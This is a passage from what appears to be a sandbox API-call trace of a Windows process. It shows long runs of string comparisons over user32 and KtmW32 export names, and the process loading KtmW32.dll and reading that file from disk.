lpString2="AdjustWindowRect") returned 1 [0104.402] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AdjustWindowRectEx") returned 1 [0104.402] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AlignRects") returned 1 [0104.402] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AllowForegroundActivation") returned 1 [0104.402] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AllowSetForegroundWindow") returned 1 [0104.402] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AnimateWindow") returned 1 [0104.402] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AnyPopup") returned 1 [0104.402] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AppendMenuA") returned 1 [0104.403] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AppendMenuW") returned 1 [0104.403] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="ArrangeIconicWindows") returned 1 [0104.403] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AttachThreadInput") returned 1 [0104.403] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BeginDeferWindowPos") returned 1 [0104.403] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BeginPaint") returned 1 [0104.403] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BlockInput") returned 1 [0104.403] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BringWindowToTop") returned 1 [0104.403] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BroadcastSystemMessage") returned 1 [0104.403] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BroadcastSystemMessageA") returned 1 [0104.403] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BroadcastSystemMessageExA") returned 0 [0104.403] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="ActivateKeyboardLayout") returned 1 [0104.403] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AddClipboardFormatListener") returned 1 [0104.403] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AdjustWindowRect") returned 1 [0104.403] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AdjustWindowRectEx") returned 1 [0104.403] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AlignRects") returned 1 [0104.403] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AllowForegroundActivation") returned 1 [0104.403] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AllowSetForegroundWindow") returned 1 [0104.403] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AnimateWindow") returned 1 [0104.403] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AnyPopup") returned 1 [0104.403] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AppendMenuA") returned 1 [0104.403] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AppendMenuW") returned 1 [0104.403] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="ArrangeIconicWindows") returned 1 [0104.403] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AttachThreadInput") returned 1 [0104.403] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BeginDeferWindowPos") returned 1 [0104.403] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BeginPaint") returned 1 [0104.404] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BlockInput") returned 1 [0104.404] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BringWindowToTop") returned 1 [0104.404] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessage") returned 1 [0104.404] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessageA") returned 1 [0104.404] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessageExA") returned 1 [0104.404] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessageExW") returned 0 [0104.404] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="ActivateKeyboardLayout") returned 1 [0104.404] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AddClipboardFormatListener") returned 1 [0104.404] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AdjustWindowRect") returned 1 [0104.404] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AdjustWindowRectEx") returned 1 [0104.404] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AlignRects") returned 1 [0104.404] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AllowForegroundActivation") returned 1 [0104.404] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AllowSetForegroundWindow") returned 1 [0104.404] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AnimateWindow") returned 1 [0104.404] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AnyPopup") returned 1 [0104.404] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AppendMenuA") returned 1 [0104.404] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AppendMenuW") returned 1 [0104.404] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="ArrangeIconicWindows") returned 1 [0104.404] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AttachThreadInput") returned 1 [0104.404] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BeginDeferWindowPos") returned 1 [0104.404] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BeginPaint") returned 1 [0104.404] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BlockInput") returned 1 [0104.405] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BringWindowToTop") returned 1 [0104.405] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BroadcastSystemMessage") returned 1 [0105.688] GetProcessHeap () returned 0x5b0000 [0105.688] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x40e4040 | out: hHeap=0x5b0000) returned 1 [0105.695] GetProcessHeap () returned 0x5b0000 [0105.695] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5c91e0 [0105.695] LoadLibraryA (lpLibFileName="KtmW32.dll") returned 0x7ffc4bf10000 [0105.699] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0105.699] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0105.699] GetModuleFileNameA (in: hModule=0x7ffc4bf10000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\KtmW32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll")) returned 0x1e [0105.699] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\KtmW32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0105.699] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0105.699] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0105.699] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=24064) returned 1 [0105.699] GetProcessHeap () returned 0x5b0000 [0105.699] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x5e00) returned 0x2d25030 [0105.699] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0105.700] ReadFile (in: hFile=0x17c, lpBuffer=0x2d25030, nNumberOfBytesToRead=0x5e00, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2d25030*, lpNumberOfBytesRead=0x14f5a4*=0x5e00, lpOverlapped=0x0) returned 1 [0105.701] CloseHandle (hObject=0x17c) returned 1 [0105.701] lstrcmpA (lpString1="CommitComplete", lpString2="CommitComplete") returned 0 [0105.701] lstrcmpA (lpString1="CommitEnlistment", lpString2="CommitComplete") returned 1 [0105.701] lstrcmpA (lpString1="CommitEnlistment", lpString2="CommitEnlistment") returned 0 [0105.701] lstrcmpA (lpString1="CommitTransaction", lpString2="CommitComplete") returned 1 [0105.701] lstrcmpA (lpString1="CommitTransaction", lpString2="CommitEnlistment") returned 1 [0105.701] lstrcmpA (lpString1="CommitTransaction", lpString2="CommitTransaction") returned 0 [0105.701] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitComplete") returned 1 [0105.701] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitEnlistment") returned 1 [0105.701] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitTransaction") returned 1 [0105.701] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitTransactionAsync") returned 0 [0105.701] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitComplete") returned 1 [0105.701] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitEnlistment") returned 1 [0105.701] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitTransaction") returned 1 [0105.701] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitTransactionAsync") returned 1 [0105.701] lstrcmpA (lpString1="CreateEnlistment", lpString2="CreateEnlistment") returned 0 [0105.702] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitComplete") returned 1 [0105.702] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitEnlistment") returned 1 [0105.702] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitTransaction") returned 1 [0105.702] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitTransactionAsync") returned 1 [0105.702] lstrcmpA (lpString1="CreateResourceManager", lpString2="CreateEnlistment") returned 1 [0105.702] lstrcmpA (lpString1="CreateResourceManager", lpString2="CreateResourceManager") returned 0 [0105.702] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitComplete") returned 1 [0105.702] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitEnlistment") returned 1 [0105.702] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitTransaction") returned 1 [0105.702] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitTransactionAsync") returned 1 [0105.702] lstrcmpA (lpString1="CreateTransaction", lpString2="CreateEnlistment") returned 1 [0105.702] lstrcmpA (lpString1="CreateTransaction", lpString2="CreateResourceManager") returned 1 [0105.702] lstrcmpA (lpString1="CreateTransaction", lpString2="CreateTransaction") returned 0 [0105.702] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitComplete") returned 1 [0105.702] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitEnlistment") returned 1 [0105.702] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitTransaction") returned 1 [0105.702] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitTransactionAsync") returned 1 [0105.702] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateEnlistment") returned 1 [0105.702] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateResourceManager") returned 1 [0105.702] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateTransaction") returned 1 [0105.702] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateTransactionManager") returned 0 [0105.702] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitComplete") returned 1 [0105.702] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitEnlistment") returned 1 [0105.702] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitTransaction") returned 1 [0105.702] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitTransactionAsync") returned 1 [0105.702] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateEnlistment") returned 1 [0105.702] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateResourceManager") returned 1 [0105.702] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateTransaction") returned 1 [0105.703] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateTransactionManager") returned 1 [0105.703] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="GetCurrentClockTransactionManager") returned 0 [0105.703] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitComplete") returned 1 [0105.703] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitEnlistment") returned 1 [0105.703] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitTransaction") returned 1 [0105.703] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitTransactionAsync") returned 1 [0105.703] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateEnlistment") returned 1 [0105.703] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateResourceManager") returned 1 [0105.703] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateTransaction") returned 1 [0105.703] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateTransactionManager") returned 1 [0105.703] lstrcmpA (lpString1="GetEnlistmentId", lpString2="GetCurrentClockTransactionManager") returned 1 [0105.703] lstrcmpA (lpString1="GetEnlistmentId", lpString2="GetEnlistmentId") returned 0 [0105.703] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitComplete") returned 1 [0105.703] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitEnlistment") returned 1 [0105.703] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitTransaction") returned 1 [0105.703] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitTransactionAsync") returned 1 [0105.703] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateEnlistment") returned 1 [0105.703] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateResourceManager") returned 1 [0105.703] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateTransaction") returned 1 [0105.703] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateTransactionManager") returned 1 [0105.703] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="GetCurrentClockTransactionManager") returned 1 [0105.703] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="GetEnlistmentId") returned 1 [0105.703] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="GetEnlistmentRecoveryInformation") returned 0 [0105.703] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitComplete") returned 1 [0105.703] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitEnlistment") returned 1 [0105.703] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitTransaction") returned 1 [0105.703] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitTransactionAsync") returned 1 [0105.703] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateEnlistment") returned 1 [0105.703] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateResourceManager") returned 1 [0105.704] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateTransaction") returned 1 [0105.704] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateTransactionManager") returned 1 [0105.704] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetCurrentClockTransactionManager") returned 1 [0105.704] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetEnlistmentId") returned 1 [0105.704] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0105.704] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetNotificationResourceManager") returned 0 [0105.704] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitComplete") returned 1 [0105.704] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitEnlistment") returned 1 [0105.704] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitTransaction") returned 1 [0105.704] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitTransactionAsync") returned 1 [0105.704] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateEnlistment") returned 1 [0105.704] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateResourceManager") returned 1 [0105.704] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateTransaction") returned 1 [0105.704] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateTransactionManager") returned 1 [0105.704] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetCurrentClockTransactionManager") returned 1 [0105.704] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetEnlistmentId") returned 1 [0105.704] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0105.704] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetNotificationResourceManager") returned 1 [0105.704] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetNotificationResourceManagerAsync") returned 0 [0105.704] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitComplete") returned 1 [0105.704] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitEnlistment") returned 1 [0105.704] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitTransaction") returned 1 [0105.705] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitTransactionAsync") returned 1 [0105.705] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateEnlistment") returned 1 [0105.705] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateResourceManager") returned 1 [0105.705] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateTransaction") returned 1 [0105.705] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateTransactionManager") returned 1 [0105.705] lstrcmpA (lpString1="GetTransactionId", lpString2="GetCurrentClockTransactionManager") returned 1 [0105.705] lstrcmpA (lpString1="GetTransactionId", lpString2="GetEnlistmentId") returned 1 [0105.705] lstrcmpA (lpString1="GetTransactionId", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0105.705] lstrcmpA (lpString1="GetTransactionId", lpString2="GetNotificationResourceManager") returned 1 [0105.705] lstrcmpA (lpString1="GetTransactionId", lpString2="GetNotificationResourceManagerAsync") returned 1 [0105.705] lstrcmpA (lpString1="GetTransactionId", lpString2="GetTransactionId") returned 0 [0105.705] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitComplete") returned 1 [0105.705] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitEnlistment") returned 1 [0105.705] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitTransaction") returned 1 [0105.705] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitTransactionAsync") returned 1 [0105.705] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateEnlistment") returned 1 [0105.705] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateResourceManager") returned 1 [0105.705] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateTransaction") returned 1 [0105.705] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateTransactionManager") returned 1 [0105.705] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetCurrentClockTransactionManager") returned 1 [0105.705] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetEnlistmentId") returned 1 [0105.705] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0105.705] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetNotificationResourceManager") returned 1 [0105.706] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetNotificationResourceManagerAsync") returned 1 [0105.706] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetTransactionId") returned 1 [0105.706] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetTransactionInformation") returned 0 [0105.706] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitComplete") returned 1 [0105.706] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitEnlistment") returned 1 [0105.706] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitTransaction") returned 1 [0105.706] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitTransactionAsync") returned 1 [0105.706] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateEnlistment") returned 1 [0105.706] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateResourceManager") returned 1 [0105.706] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateTransaction") returned 1 [0105.706] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateTransactionManager") returned 1 [0105.706] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetCurrentClockTransactionManager") returned 1 [0105.706] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetEnlistmentId") returned 1 [0105.706] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0105.706] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetNotificationResourceManager") returned 1 [0105.706] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetNotificationResourceManagerAsync") returned 1 [0105.706] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetTransactionId") returned 1 [0105.706] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetTransactionInformation") returned 1 [0105.706] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetTransactionManagerId") returned 0 [0105.706] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitComplete") returned 1 [0105.706] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitEnlistment") returned 1 [0105.707] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitTransaction") returned 1 [0105.707] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitTransactionAsync") returned 1 [0105.707] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateEnlistment") returned 1 [0105.707] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateResourceManager") returned 1 [0105.707] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateTransaction") returned 1 [0105.707] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateTransactionManager") returned 1 [0105.707] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetCurrentClockTransactionManager") returned 1 [0105.707] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetEnlistmentId") returned 1 [0105.707] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0105.707] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetNotificationResourceManager") returned 1 [0105.707] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetNotificationResourceManagerAsync") returned 1 [0105.707] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetTransactionId") returned 1 [0105.707] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetTransactionInformation") returned 1 [0105.707] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetTransactionManagerId") returned 1 [0105.707] lstrcmpA (lpString1="OpenEnlistment", lpString2="OpenEnlistment") returned 0 [0105.707] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitComplete") returned 1 [0105.707] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitEnlistment") returned 1 [0105.707] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitTransaction") returned 1 [0105.707] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitTransactionAsync") returned 1 [0105.707] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateEnlistment") returned 1 [0105.707] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateResourceManager") returned 1 [0105.707] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateTransaction") returned 1 [0105.707] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateTransactionManager") returned 1 [0105.707] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetCurrentClockTransactionManager") returned 1 [0105.708] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetEnlistmentId") returned 1 [0105.708] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0105.708] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetNotificationResourceManager") returned 1 [0105.708] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetNotificationResourceManagerAsync") returned 1 [0105.708] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetTransactionId") returned 1 [0105.708] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetTransactionInformation") returned 1 [0105.708] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetTransactionManagerId") returned 1 [0105.708] lstrcmpA (lpString1="OpenResourceManager", lpString2="OpenEnlistment") returned 1 [0105.708] lstrcmpA (lpString1="OpenResourceManager", lpString2="OpenResourceManager") returned 0 [0105.708] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitComplete") returned 1 [0105.708] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitEnlistment") returned 1 [0105.708] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitTransaction") returned 1 [0105.708] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitTransactionAsync") returned 1 [0105.708] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateEnlistment") returned 1 [0105.708] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateResourceManager") returned 1 [0105.708] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateTransaction") returned 1 [0105.708] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateTransactionManager") returned 1 [0105.708] lstrcmpA (lpString1="OpenTransaction", lpString2="GetCurrentClockTransactionManager") returned 1 [0105.708] lstrcmpA (lpString1="OpenTransaction", lpString2="GetEnlistmentId") returned 1 [0105.708] lstrcmpA (lpString1="OpenTransaction", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0105.708] lstrcmpA (lpString1="OpenTransaction", lpString2="GetNotificationResourceManager") returned 1 [0105.708] lstrcmpA (lpString1="OpenTransaction", lpString2="GetNotificationResourceManagerAsync") returned 1 [0105.708] lstrcmpA (lpString1="OpenTransaction", lpString2="GetTransactionId") returned 1 [0105.708] lstrcmpA (lpString1="OpenTransaction", lpString2="GetTransactionInformation") returned 1 [0105.708] lstrcmpA (lpString1="OpenTransaction", lpString2="GetTransactionManagerId") returned 1 [0105.708] lstrcmpA (lpString1="OpenTransaction", lpString2="OpenEnlistment") returned 1 [0105.708] lstrcmpA (lpString1="OpenTransaction", lpString2="OpenResourceManager") returned 1 [0105.709] lstrcmpA (lpString1="OpenTransaction", lpString2="OpenTransaction") returned 0 [0105.709] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitComplete") returned 1 [0105.709] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitEnlistment") returned 1 [0105.709] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitTransaction") returned 1 [0105.709] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitTransactionAsync") returned 1 [0105.709] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateEnlistment") returned 1 [0105.709] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateResourceManager") returned 1 [0105.709] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateTransaction") returned 1 [0105.709] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateTransactionManager") returned 1 [0105.709] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetCurrentClockTransactionManager") returned 1 [0105.709] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetEnlistmentId") returned 1 [0105.709] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0105.709] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetNotificationResourceManager") returned 1 [0105.709] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetNotificationResourceManagerAsync") returned 1 [0105.709] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetTransactionId") returned 1 [0105.709] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetTransactionInformation") returned 1 [0105.709] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetTransactionManagerId") returned 1 [0105.709] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenEnlistment") returned 1 [0105.709] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenResourceManager") returned 1 [0105.709] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenTransaction") returned 1 [0105.709] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenTransactionManager") returned 0 [0105.709] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitComplete") returned 1 [0105.709] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitEnlistment") returned 1 [0105.709] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitTransaction") returned 1 [0105.709] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitTransactionAsync") returned 1 [0105.709] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateEnlistment") returned 1 [0105.709] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateResourceManager") returned 1 [0105.709] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateTransaction") returned 1 [0105.710] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateTransactionManager") returned 1 [0105.710] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetCurrentClockTransactionManager") returned 1 